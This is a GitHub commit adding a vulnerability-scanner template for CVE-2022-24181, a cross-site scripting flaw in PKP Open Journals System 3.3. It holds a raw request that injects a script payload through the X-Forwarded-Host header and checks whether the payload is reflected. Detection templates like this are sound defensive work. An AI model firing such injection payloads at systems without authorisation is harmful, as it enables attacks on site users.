Merge pull request #4784 from lucasljm2001/CVE-2022-24181

Create CVE-2022-24181.yaml
patch-1
Prince Chaddha 2022-07-10 01:55:40 +05:30 committed by GitHub
commit a42fc4a320
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2022-24181
info:
name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
author: lucasljm2001,ekrause
severity: medium
description: |
Detects an XSS vulnerability in Open Journals System.
reference:
- https://www.exploit-db.com/exploits/50881
- https://github.com/pkp/pkp-lib/issues/7649
- https://youtu.be/v8-9evO2oVg
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24181
tags: cve,cve2022,xss,oss,pkp-lib
requests:
- raw:
- |
GET /iupjournals/index.php/esj HTTP/2
Host: {{Hostname}}
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script><x=".com/iupjournals'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200